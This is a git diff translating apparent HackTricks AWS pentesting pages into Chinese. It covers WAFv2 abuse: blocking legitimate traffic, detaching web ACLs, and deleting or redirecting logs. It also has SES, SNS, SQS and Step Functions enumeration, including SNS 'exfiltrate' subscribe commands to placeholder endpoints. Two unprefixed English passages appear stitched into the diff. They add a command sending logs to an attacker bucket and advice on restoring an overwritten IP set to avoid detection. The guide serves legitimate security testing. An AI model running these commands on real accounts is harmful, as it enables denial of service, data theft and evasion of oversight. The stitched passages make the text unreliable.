> [!NOTE] -> You can only delete the specified **WebACL** if **ManagedByFirewallManager** is false. - +> 只有当 **ManagedByFirewallManager** 为 false 时,您才能删除指定的 **WebACL**。 ```bash # Create Web ACL aws wafv2 create-web-acl --name --default-action --visibility-config \ @@ -268,119 +259,109 @@ aws wafv2 update-web-acl --name --id --default-action -- # Delete Web ACL aws wafv2 delete-web-acl --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> ``` +以下示例显示如何更新 Web ACL 以阻止来自特定 IP 集的合法流量。如果源 IP 不匹配这些 IP 中的任何一个,默认操作也将阻止它,从而导致 DoS。 -The following examples shows how to update a Web ACL to block the legitimate traffic from a specific IP set. 
If the origin IP does not match any of those IPs, the default action would also be blocking it, causing a DoS. - -**Original Web ACL**: - +**原始 Web ACL**: ```json { - "WebACL": { - "Name": "AllowLegitimateIPsWebACL", - "Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", - "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", - "DefaultAction": { - "Allow": {} - }, - "Description": "", - "Rules": [ - { - "Name": "AllowLegitimateIPsRule", - "Priority": 0, - "Statement": { - "IPSetReferenceStatement": { - "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" - } - }, - "Action": { - "Allow": {} - }, - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "AllowLegitimateIPsRule" - } - } - ], - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "AllowLegitimateIPsWebACL" - }, - "Capacity": 1, - "ManagedByFirewallManager": false, - "LabelNamespace": "awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:" - }, - "LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +"WebACL": { +"Name": "AllowLegitimateIPsWebACL", +"Id": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", +"ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f", +"DefaultAction": { +"Allow": {} +}, +"Description": "", +"Rules": [ +{ +"Name": "AllowLegitimateIPsRule", +"Priority": 0, +"Statement": { +"IPSetReferenceStatement": { +"ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +} +}, +"Action": { +"Allow": {} +}, +"VisibilityConfig": { +"SampledRequestsEnabled": false, +"CloudWatchMetricsEnabled": false, +"MetricName": "AllowLegitimateIPsRule" +} +} +], +"VisibilityConfig": { +"SampledRequestsEnabled": false, +"CloudWatchMetricsEnabled": false, +"MetricName": "AllowLegitimateIPsWebACL" +}, +"Capacity": 1, +"ManagedByFirewallManager": false, +"LabelNamespace": "awswaf:123456789012:webacl:AllowLegitimateIPsWebACL:" +}, +"LockToken": "1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" } ``` - -Command to update the Web ACL: - +更新 Web ACL 的命令: ```json aws wafv2 update-web-acl --name AllowLegitimateIPsWebACL --scope REGIONAL --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --default-action Block={} --visibility-config SampledRequestsEnabled=false,CloudWatchMetricsEnabled=false,MetricName=AllowLegitimateIPsWebACL --rules file://rule.json --region us-east-1 ``` - -The **rule.json** file would look like: - +该 **rule.json** 文件看起来像: ```json [ - { - "Name": "BlockLegitimateIPsRule", - "Priority": 0, - "Statement": { - "IPSetReferenceStatement": { - "ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" - } - }, - "Action": { - "Block": {} - }, - "VisibilityConfig": { - "SampledRequestsEnabled": false, - "CloudWatchMetricsEnabled": false, - "MetricName": "BlockLegitimateIPRule" - } - } +{ +"Name": "BlockLegitimateIPsRule", +"Priority": 0, +"Statement": { +"IPSetReferenceStatement": { +"ARN": "arn:aws:wafv2:us-east-1:123456789012:regional/ipset/LegitimateIPv4/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f" +} +}, +"Action": { +"Block": {} +}, +"VisibilityConfig": { +"SampledRequestsEnabled": false, +"CloudWatchMetricsEnabled": false, +"MetricName": "BlockLegitimateIPRule" +} +} ] ``` - -**Potential Impact**: 
Unauthorized access, data breaches, and potential DoS attacks. +**潜在影响**:未经授权的访问、数据泄露和潜在的拒绝服务攻击。 #### **`wafv2:AssociateWebACL`, `wafv2:DisassociateWebACL`** -The **`wafv2:AssociateWebACL`** permission would allow an attacker to associate web ACLs (Access Control Lists) with resources, being able to bypass security controls, allowing unauthorized traffic to reach the application, potentially leading to exploits like SQL injection or cross-site scripting (XSS). Conversely, with the **`wafv2:DisassociateWebACL`** permission, the attacker could temporarily disable security protections, exposing the resources to vulnerabilities without detection. +**`wafv2:AssociateWebACL`** 权限将允许攻击者将 web ACL(访问控制列表)与资源关联,从而能够绕过安全控制,允许未经授权的流量到达应用程序,可能导致 SQL 注入或跨站脚本(XSS)等漏洞。相反,使用 **`wafv2:DisassociateWebACL`** 权限,攻击者可以暂时禁用安全保护,使资源暴露于未被检测的漏洞中。 -The additional permissions would be needed depending on the protected resource type: - -- **Associate** - - apigateway:SetWebACL - - apprunner:AssociateWebAcl - - appsync:SetWebACL - - cognito-idp:AssociateWebACL - - ec2:AssociateVerifiedAccessInstanceWebAcl - - elasticloadbalancing:SetWebAcl -- **Disassociate** - - apigateway:SetWebACL - - apprunner:DisassociateWebAcl - - appsync:SetWebACL - - cognito-idp:DisassociateWebACL - - ec2:DisassociateVerifiedAccessInstanceWebAcl - - elasticloadbalancing:SetWebAcl +根据受保护资源类型,可能需要额外的权限: +- **关联** +- apigateway:SetWebACL +- apprunner:AssociateWebAcl +- appsync:SetWebACL +- cognito-idp:AssociateWebACL +- ec2:AssociateVerifiedAccessInstanceWebAcl +- elasticloadbalancing:SetWebAcl +- **解除关联** +- apigateway:SetWebACL +- apprunner:DisassociateWebAcl +- appsync:SetWebACL +- cognito-idp:DisassociateWebACL +- ec2:DisassociateVerifiedAccessInstanceWebAcl +- elasticloadbalancing:SetWebAcl ```bash # Associate aws wafv2 associate-web-acl --web-acl-arn --resource-arn # Disassociate aws wafv2 disassociate-web-acl --resource-arn ``` - -**Potential Impact**: Compromised resources security, increased risk of exploitation, and potential service disruptions within AWS environments protected by AWS WAF. +**潜在影响**:资源安全受到威胁,利用风险增加,以及在受 AWS WAF 保护的 AWS 环境中可能出现服务中断。 #### **`wafv2:CreateIPSet` , `wafv2:UpdateIPSet`, `wafv2:DeleteIPSet`** -An attacker would be able to create, update and delete the IP sets managed by AWS WAF. This could be dangerous since could create new IP sets to allow malicious traffic, modify IP sets in order to block legitimate traffic, update existing IP sets to include malicious IP addresses, remove trusted IP addresses or delete critical IP sets that are meant to protect critical resources. - +攻击者将能够创建、更新和删除由 AWS WAF 管理的 IP 集。这可能是危险的,因为攻击者可以创建新的 IP 集以允许恶意流量,修改 IP 集以阻止合法流量,更新现有 IP 集以包含恶意 IP 地址,移除受信任的 IP 地址或删除旨在保护关键资源的关键 IP 集。 ```bash # Create IP set aws wafv2 create-ip-set --name --ip-address-version --addresses --scope | CLOUDFRONT --region=us-east-1> @@ -389,23 +370,19 @@ aws wafv2 update-ip-set --name --id --addresses --lock-t # Delete IP set aws wafv2 delete-ip-set --name --id --lock-token --scope | CLOUDFRONT --region=us-east-1> ``` - -The following example shows how to **overwrite the existing IP set by the desired IP set**: - +以下示例演示了如何**用所需的 IP 集覆盖现有的 IP 集**: ```bash aws wafv2 update-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --addresses 99.99.99.99/32 --lock-token 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f --scope CLOUDFRONT --region us-east-1 ``` - -**Potential Impact**: Unauthorized access and block of legitimate traffic. 
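To make the overwrite shown above less noticeable, the original address list could be saved first and restored once the attack is over. A hedged sketch reusing the same placeholder name and ID:

```bash
# Save the current addresses (the response also contains the lock token needed for updates)
aws wafv2 get-ip-set --name LegitimateIPv4Set --id 1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f \
  --scope CLOUDFRONT --region us-east-1 > original-ip-set.json
# Later, restore the saved addresses with another update-ip-set call to reduce the chance of detection
```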
+**潜在影响**:未经授权的访问和合法流量的阻止。 #### **`wafv2:CreateRegexPatternSet`** , **`wafv2:UpdateRegexPatternSet`**, **`wafv2:DeleteRegexPatternSet`** -An attacker with these permissions would be able to manipulate the regular expression pattern sets used by AWS WAF to control and filter incoming traffic based on specific patterns. - -- Creating new regex patterns would help an attacker to allow harmful content -- Updating the existing patterns, an attacker would to bypass security rules -- Deleting patterns that are designed to block malicious activities could lead an attacker to the send malicious payloads and bypass the security measures. +拥有这些权限的攻击者将能够操纵 AWS WAF 使用的正则表达式模式集,以根据特定模式控制和过滤传入流量。 +- 创建新的正则表达式模式将帮助攻击者允许有害内容 +- 更新现有模式,攻击者将能够绕过安全规则 +- 删除旨在阻止恶意活动的模式可能导致攻击者发送恶意有效负载并绕过安全措施。 ```bash # Create regex pattern set aws wafv2 create-regex-pattern-set --name --regular-expression-list --scope | CLOUDFRONT --region=us-east-1> [--description ] @@ -414,62 +391,51 @@ aws wafv2 update-regex-pattern-set --name --id --regular-express # Delete regex pattern set aws wafv2 delete-regex-pattern-set --name --scope | CLOUDFRONT --region=us-east-1> --id --lock-token ``` - -**Potential Impact**: Bypass security controls, allowing malicious content and potentially exposing sensitive data or disrupting services and resources protected by AWS WAF. +**潜在影响**:绕过安全控制,允许恶意内容并可能暴露敏感数据或干扰受 AWS WAF 保护的服务和资源。 #### **(`wavf2:PutLoggingConfiguration` &** `iam:CreateServiceLinkedRole`), **`wafv2:DeleteLoggingConfiguration`** -An attacker with the **`wafv2:DeleteLoggingConfiguration`** would be able to remove the logging configuration from the specified Web ACL. Subsequently, with the **`wavf2:PutLoggingConfiguration`** and **`iam:CreateServiceLinkedRole`** permissions, an attacker could create or replace logging configurations (after having deleted it) to either prevent logging altogether or redirect logs to unauthorized destinations, such as Amazon S3 buckets, Amazon CloudWatch Logs log group or an Amazon Kinesis Data Firehose under control. +拥有 **`wafv2:DeleteLoggingConfiguration`** 权限的攻击者将能够从指定的 Web ACL 中删除日志配置。随后,凭借 **`wavf2:PutLoggingConfiguration`** 和 **`iam:CreateServiceLinkedRole`** 权限,攻击者可以创建或替换日志配置(在删除后)以完全阻止日志记录或将日志重定向到未经授权的目的地,例如 Amazon S3 存储桶、Amazon CloudWatch Logs 日志组或受控的 Amazon Kinesis Data Firehose。 -During the creation process, the service automatically sets up the necessary permissions to allow logs to be written to the specified logging destination: +在创建过程中,该服务会自动设置必要的权限,以允许日志写入指定的日志目的地: -- **Amazon CloudWatch Logs:** AWS WAF creates a resource policy on the designated CloudWatch Logs log group. This policy ensures that AWS WAF has the permissions required to write logs to the log group. -- **Amazon S3 Bucket:** AWS WAF creates a bucket policy on the designated S3 bucket. This policy grants AWS WAF the permissions necessary to upload logs to the specified bucket. -- **Amazon Kinesis Data Firehose:** AWS WAF creates a service-linked role specifically for interacting with Kinesis Data Firehose. This role allows AWS WAF to deliver logs to the configured Firehose stream. +- **Amazon CloudWatch Logs:** AWS WAF 在指定的 CloudWatch Logs 日志组上创建资源策略。该策略确保 AWS WAF 拥有将日志写入日志组所需的权限。 +- **Amazon S3 存储桶:** AWS WAF 在指定的 S3 存储桶上创建存储桶策略。该策略授予 AWS WAF 上传日志到指定存储桶所需的权限。 +- **Amazon Kinesis Data Firehose:** AWS WAF 创建一个专门用于与 Kinesis Data Firehose 交互的服务链接角色。该角色允许 AWS WAF 将日志传送到配置的 Firehose 流。 > [!NOTE] -> It is possible to define only one logging destination per web ACL. 
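A concrete, hedged instance of the put call whose generic signature follows, pointing web ACL logs at an attacker-controlled bucket. The ARNs are illustrative, WAF logging destinations must be named with the `aws-waf-logs-` prefix, and the destination still needs a policy that allows log delivery:

```bash
aws wafv2 put-logging-configuration --logging-configuration '{
  "ResourceArn": "arn:aws:wafv2:us-east-1:123456789012:regional/webacl/AllowLegitimateIPsWebACL/1a2b3c4d-1a2b-1a2b-1a2b-1a2b3c4d5e6f",
  "LogDestinationConfigs": ["arn:aws:s3:::aws-waf-logs-attacker-bucket"]
}'
```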
- +> 每个 web ACL 只能定义一个日志目的地。 ```bash # Put logging configuration aws wafv2 put-logging-configuration --logging-configuration # Delete logging configuration aws wafv2 delete-logging-configuration --resource-arn [--log-scope ] [--log-type ] ``` - -**Potential Impact:** Obscure visibility into security events, difficult the incident response process, and facilitate covert malicious activities within AWS WAF-protected environments. +**潜在影响:** 对安全事件的可见性模糊,导致事件响应过程困难,并促进在AWS WAF保护环境内的隐秘恶意活动。 #### **`wafv2:DeleteAPIKey`** -An attacker with this permissions would be able to delete existing API keys, rendering the CAPTCHA ineffective and disrupting the functionality that relies on it, such as form submissions and access controls. Depending on the implementation of this CAPTCHA, this could lead either to a CAPTCHA bypass or to a DoS if the error management is not properly set in the resource. - +拥有此权限的攻击者将能够删除现有的API密钥,使CAPTCHA失效,并干扰依赖于它的功能,例如表单提交和访问控制。根据此CAPTCHA的实现,这可能导致CAPTCHA绕过或在资源的错误管理未正确设置时导致DoS。 ```bash # Delete API key aws wafv2 delete-api-key --api-key --scope | CLOUDFRONT --region=us-east-1> ``` - -**Potential Impact**: Disable CAPTCHA protections or disrupt application functionality, leading to security breaches and potential data theft. +**潜在影响**:禁用 CAPTCHA 保护或干扰应用程序功能,导致安全漏洞和潜在数据泄露。 #### **`wafv2:TagResource`, `wafv2:UntagResource`** -An attacker would be able to add, modify, or remove tags from AWS WAFv2 resources, such as Web ACLs, rule groups, IP sets, regex pattern sets, and logging configurations. - +攻击者将能够添加、修改或删除 AWS WAFv2 资源的标签,例如 Web ACL、规则组、IP 集、正则表达式模式集和日志配置。 ```bash # Tag aws wafv2 tag-resource --resource-arn --tags # Untag aws wafv2 untag-resource --resource-arn --tag-keys ``` +**潜在影响**:资源篡改、信息泄露、成本操控和操作中断。 -**Potential Impact**: Resource tampering, information leakage, cost manipulation and operational disruption. - -## References +## 参考文献 - [https://www.citrusconsulting.com/aws-web-application-firewall-waf/#:\~:text=Conditions%20allow%20you%20to%20specify,user%20via%20a%20web%20application](https://www.citrusconsulting.com/aws-web-application-firewall-waf/) - [https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html](https://docs.aws.amazon.com/service-authorization/latest/reference/list_awswafv2.html) {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md index bc6af90f1..74c43743f 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ses-enum.md @@ -2,45 +2,40 @@ {{#include ../../../banners/hacktricks-training.md}} -## Basic Information +## 基本信息 -Amazon Simple Email Service (Amazon SES) is designed for **sending and receiving emails**. It enables users to send transactional, marketing, or notification emails efficiently and securely at scale. It **integrates well with other AWS services**, providing a robust solution for managing email communications for businesses of all sizes. +Amazon Simple Email Service (Amazon SES) 旨在 **发送和接收电子邮件**。它使用户能够高效且安全地大规模发送事务性、营销或通知电子邮件。它 **与其他 AWS 服务集成良好**,为各类企业提供了管理电子邮件通信的强大解决方案。 -You need to register **identities**, which can be domains or emails addresses that will be able to interact with SES (e.g. send and receive emails). 
+您需要注册 **身份**,这些身份可以是能够与 SES 交互的域名或电子邮件地址(例如,发送和接收电子邮件)。 -### SMTP User - -It's possible to connect to a **SMTP server of AWS to perform actions** instead of using the AWS API (or in addition). For this you need to create a user with a policy such as: +### SMTP 用户 +可以连接到 **AWS 的 SMTP 服务器以执行操作**,而不是使用 AWS API(或作为补充)。为此,您需要创建一个具有以下策略的用户: ```json { - "Version": "2012-10-17", - "Statement": [ - { - "Effect": "Allow", - "Action": "ses:SendRawEmail", - "Resource": "*" - } - ] +"Version": "2012-10-17", +"Statement": [ +{ +"Effect": "Allow", +"Action": "ses:SendRawEmail", +"Resource": "*" +} +] } ``` - -Then, gather the **API key and secret** of the user and run: - +然后,收集用户的 **API 密钥和秘密** 并运行: ```bash git clone https://github.com/lisenet/ses-smtp-converter.git cd ./ses-smtp-converter chmod u+x ./ses-smtp-conv.sh ./ses-smtp-conv.sh ``` +从AWS控制台网页上也可以做到这一点。 -It's also possible to do this from the AWS console web. - -### Enumeration +### 枚举 > [!WARNING] -> Note that SES has 2 APIs: **`ses`** and **`sesv2`**. Some actions are in both APIs and others are just in one of the two. - +> 请注意,SES有两个API:**`ses`**和**`sesv2`**。某些操作在两个API中都有,而其他操作仅在其中一个中。 ```bash # Get info about the SES account aws sesv2 get-account @@ -117,15 +112,10 @@ aws ses get-send-quota ## Get statistics aws ses get-send-statistics ``` - -### Post Exploitation +### 后期利用 {{#ref}} ../aws-post-exploitation/aws-ses-post-exploitation.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md index cca4353cb..7a73e9b31 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sns-enum.md @@ -4,18 +4,17 @@ ## SNS -Amazon Simple Notification Service (Amazon SNS) is described as a **fully managed messaging service**. It supports both **application-to-application** (A2A) and **application-to-person** (A2P) communication types. +亚马逊简单通知服务(Amazon SNS)被描述为一个**完全托管的消息服务**。它支持**应用程序到应用程序**(A2A)和**应用程序到个人**(A2P)通信类型。 -Key features for A2A communication include **publish/subscribe (pub/sub) mechanisms**. These mechanisms introduce **topics**, crucial for enabling high-throughput, **push-based, many-to-many messaging**. This feature is highly advantageous in scenarios that involve distributed systems, microservices, and event-driven serverless architectures. By leveraging these topics, publisher systems can efficiently distribute messages to a **wide range of subscriber systems**, facilitating a fanout messaging pattern. +A2A通信的关键特性包括**发布/订阅(pub/sub)机制**。这些机制引入了**主题**,对于实现高吞吐量的**推送式、多对多消息传递**至关重要。此功能在涉及分布式系统、微服务和事件驱动的无服务器架构的场景中非常有利。通过利用这些主题,发布系统可以有效地将消息分发给**广泛的订阅系统**,促进扇出消息模式。 -### **Difference with SQS** +### **与SQS的区别** -**SQS** is a **queue-based** service that allows point-to-point communication, ensuring that messages are processed by a **single consumer**. It offers **at-least-once delivery**, supports standard and FIFO queues, and allows message retention for retries and delayed processing.\ -On the other hand, **SNS** is a **publish/subscribe-based service**, enabling **one-to-many** communication by broadcasting messages to **multiple subscribers** simultaneously. 
It supports **various subscription endpoints like email, SMS, Lambda functions, and HTTP/HTTPS**, and provides filtering mechanisms for targeted message delivery.\ -While both services enable decoupling between components in distributed systems, SQS focuses on queued communication, and SNS emphasizes event-driven, fan-out communication patterns. - -### **Enumeration** +**SQS**是一个**基于队列**的服务,允许点对点通信,确保消息由**单个消费者**处理。它提供**至少一次交付**,支持标准和FIFO队列,并允许消息保留以进行重试和延迟处理。\ +另一方面,**SNS**是一个**基于发布/订阅的服务**,通过同时向**多个订阅者**广播消息,实现**一对多**通信。它支持**各种订阅端点,如电子邮件、短信、Lambda函数和HTTP/HTTPS**,并提供针对性消息传递的过滤机制。\ +虽然这两项服务都能实现分布式系统中组件之间的解耦,但SQS专注于排队通信,而SNS强调事件驱动的扇出通信模式。 +### **枚举** ```bash # Get topics & subscriptions aws sns list-topics @@ -24,60 +23,55 @@ aws sns list-subscriptions-by-topic --topic-arn # Check privescs & post-exploitation aws sns publish --region \ - --topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \ - --message file://message.txt +--topic-arn "arn:aws:sns:us-west-2:123456789012:my-topic" \ +--message file://message.txt # Exfiltrate through email ## You will receive an email to confirm the subscription aws sns subscribe --region \ - --topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \ - --protocol email \ - --notification-endpoint my-email@example.com +--topic-arn arn:aws:sns:us-west-2:123456789012:my-topic \ +--protocol email \ +--notification-endpoint my-email@example.com # Exfiltrate through web server ## You will receive an initial request with a URL in the field "SubscribeURL" ## that you need to access to confirm the subscription aws sns subscribe --region \ - --protocol http \ - --notification-endpoint http:/// \ - --topic-arn +--protocol http \ +--notification-endpoint http:/// \ +--topic-arn ``` - > [!CAUTION] -> Note that if the **topic is of type FIFO**, only subscribers using the protocol **SQS** can be used (HTTP or HTTPS cannot be used). +> 注意,如果**主题是FIFO类型**,则只能使用协议**SQS**的订阅者(不能使用HTTP或HTTPS)。 > -> Also, even if the `--topic-arn` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. +> 此外,即使`--topic-arn`包含区域,也请确保在**`--region`**中指定正确的区域,否则您将收到一个错误,表明您没有访问权限,但问题在于区域。 -#### Unauthenticated Access +#### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-sns-unauthenticated-enum.md {{#endref}} -#### Privilege Escalation +#### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-sns-privesc.md {{#endref}} -#### Post Exploitation +#### 利用后 {{#ref}} ../aws-post-exploitation/aws-sns-post-exploitation.md {{#endref}} -#### Persistence +#### 持久性 {{#ref}} ../aws-persistence/aws-sns-persistence.md {{#endref}} -## References +## 参考 - [https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/](https://aws.amazon.com/about-aws/whats-new/2022/01/amazon-sns-attribute-based-access-controls/) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md index 1da888587..fffbefc45 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-sqs-and-sns-enum.md @@ -4,10 +4,9 @@ ## SQS -Amazon Simple Queue Service (SQS) is presented as a **fully managed message queuing service**. 
Its main function is to assist in the scaling and decoupling of microservices, distributed systems, and serverless applications. The service is designed to remove the need for managing and operating message-oriented middleware, which can often be complex and resource-intensive. This elimination of complexity allows developers to direct their efforts towards more innovative and differentiating aspects of their work. +亚马逊简单队列服务(SQS)被呈现为一个**完全托管的消息队列服务**。其主要功能是帮助扩展和解耦微服务、分布式系统和无服务器应用程序。该服务旨在消除管理和操作面向消息的中间件的需求,这通常可能是复杂且资源密集的。这种复杂性的消除使开发人员能够将精力集中在他们工作中更具创新性和差异化的方面。 ### Enumeration - ```bash # Get queues info aws sqs list-queues @@ -18,40 +17,35 @@ aws sqs receive-message --queue-url aws sqs send-message --queue-url --message-body ``` - > [!CAUTION] -> Also, even if the `--queue-url` contains the region make sure you specify the correct region in **`--region`** or you will get an error that looks like indicate that you don't have access but the problem is the region. +> 此外,即使 `--queue-url` 包含区域,也请确保在 **`--region`** 中指定正确的区域,否则您将收到一个错误,表明您没有访问权限,但问题实际上是区域。 -#### Unauthenticated Access +#### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-sqs-unauthenticated-enum.md {{#endref}} -#### Privilege Escalation +#### 权限提升 {{#ref}} ../aws-privilege-escalation/aws-sqs-privesc.md {{#endref}} -#### Post Exploitation +#### 利用后的操作 {{#ref}} ../aws-post-exploitation/aws-sqs-post-exploitation.md {{#endref}} -#### Persistence +#### 持久性 {{#ref}} ../aws-persistence/aws-sqs-persistence.md {{#endref}} -## References +## 参考 - https://docs.aws.amazon.com/cdk/api/v2/python/aws\_cdk.aws\_sqs/README.html {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md index 873629bba..f7c153158 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-stepfunctions-enum.md @@ -4,266 +4,253 @@ ## Step Functions -AWS Step Functions is a workflow service that enables you to coordinate and orchestrate multiple AWS services into serverless workflows. By using AWS Step Functions, you can design and run workflows that connect various AWS services such as AWS Lambda, Amazon S3, Amazon DynamoDB, and many more, in a sequence of steps. This orchestration service provides a visual workflow interface and offers **state machine** capabilities, allowing you to define each step of the workflow in a declarative manner using JSON-based **Amazon States Language** (ASL). +AWS Step Functions 是一个工作流服务,使您能够协调和编排多个 AWS 服务到无服务器工作流中。通过使用 AWS Step Functions,您可以设计和运行连接各种 AWS 服务(如 AWS Lambda、Amazon S3、Amazon DynamoDB 等)的工作流,按步骤顺序进行。这项编排服务提供了可视化工作流界面,并提供 **状态机** 功能,允许您使用基于 JSON 的 **Amazon States Language** (ASL) 以声明性方式定义工作流的每个步骤。 ## Key concepts ### Standard vs. Express Workflows -AWS Step Functions offers two types of **state machine workflows**: Standard and Express. +AWS Step Functions 提供两种类型的 **状态机工作流**:标准和快速。 -- **Standard Workflow**: This default workflow type is designed for long-running, durable, and auditable processes. It supports **exactly-once execution**, ensuring tasks run only once unless retries are specified. It is ideal for workflows needing detailed execution history and can run for up to one year. -- **Express Workflow**: This type is ideal for high-volume, short-duration tasks, running up to five minutes. 
They support **at-least-once execution**, suitable for idempotent tasks like data processing. These workflows are optimized for cost and performance, charging based on executions, duration, and memory usage. +- **Standard Workflow**:此默认工作流类型旨在用于长时间运行、持久和可审计的过程。它支持 **exactly-once execution**,确保任务仅运行一次,除非指定重试。它非常适合需要详细执行历史的工作流,并且可以运行长达一年。 +- **Express Workflow**:此类型非常适合高容量、短时任务,运行时间最长可达五分钟。它们支持 **at-least-once execution**,适合幂等任务,如数据处理。这些工作流针对成本和性能进行了优化,按执行次数、持续时间和内存使用量收费。 ### States -States are the essential units of state machines. They define the individual steps within a workflow, being able to perform a variety of functions depending on its type: +状态是状态机的基本单元。它们定义工作流中的各个步骤,能够根据其类型执行各种功能: -- **Task:** Executes a job, often using an AWS service like Lambda. -- **Choice:** Makes decisions based on input. -- **Fail/Succeed:** Ends the execution with a failure or success. -- **Pass:** Passes input to output or injects data. -- **Wait:** Delays execution for a set time. -- **Parallel:** Initiates parallel branches. -- **Map:** Dynamically iterates steps over items. +- **Task:** 执行一个作业,通常使用 AWS 服务,如 Lambda。 +- **Choice:** 根据输入做出决策。 +- **Fail/Succeed:** 以失败或成功结束执行。 +- **Pass:** 将输入传递到输出或注入数据。 +- **Wait:** 延迟执行一段时间。 +- **Parallel:** 启动并行分支。 +- **Map:** 动态迭代步骤以处理项目。 ### Task -A **Task** state represents a single unit of work executed by a state machine. Tasks can invoke various resources, including activities, Lambda functions, AWS services, or third-party APIs. +**Task** 状态表示由状态机执行的单个工作单元。任务可以调用各种资源,包括活动、Lambda 函数、AWS 服务或第三方 API。 -- **Activities**: Custom workers you manage, suitable for long-running processes. - - Resource: **`arn:aws:states:region:account:activity:name`**. -- **Lambda Functions**: Executes AWS Lambda functions. - - Resource: **`arn:aws:lambda:region:account:function:function-name`**. -- **AWS Services**: Integrates directly with other AWS services, like DynamoDB or S3. - - Resource: **`arn:partition:states:region:account:servicename:APIname`**. -- **HTTP Task**: Calls third-party APIs. - - Resource field: **`arn:aws:states:::http:invoke`**. Then, you should provide the API endpoint configuration details, such as the API URL, method, and authentication details. - -The following example shows a Task state definition that invokes a Lambda function called HelloWorld: +- **Activities**: 您管理的自定义工作者,适合长时间运行的过程。 +- Resource: **`arn:aws:states:region:account:activity:name`**. +- **Lambda Functions**: 执行 AWS Lambda 函数。 +- Resource: **`arn:aws:lambda:region:account:function:function-name`**. +- **AWS Services**: 直接与其他 AWS 服务集成,如 DynamoDB 或 S3。 +- Resource: **`arn:partition:states:region:account:servicename:APIname`**. +- **HTTP Task**: 调用第三方 API。 +- Resource field: **`arn:aws:states:::http:invoke`**. 然后,您应该提供 API 端点配置详细信息,例如 API URL、方法和身份验证详细信息。 +以下示例显示了一个调用名为 HelloWorld 的 Lambda 函数的 Task 状态定义: ```json "HelloWorld": { - "Type": "Task", - "Resource": "arn:aws:states:::lambda:invoke", - "Parameters": { - "Payload.$": "$", - "FunctionName": "arn:aws:lambda:::function:HelloWorld" - }, - "End": true +"Type": "Task", +"Resource": "arn:aws:states:::lambda:invoke", +"Parameters": { +"Payload.$": "$", +"FunctionName": "arn:aws:lambda:::function:HelloWorld" +}, +"End": true } ``` - ### Choice -A **Choice** state adds conditional logic to a workflow, enabling decisions based on input data. It evaluates the specified conditions and transitions to the corresponding state based on the results. 
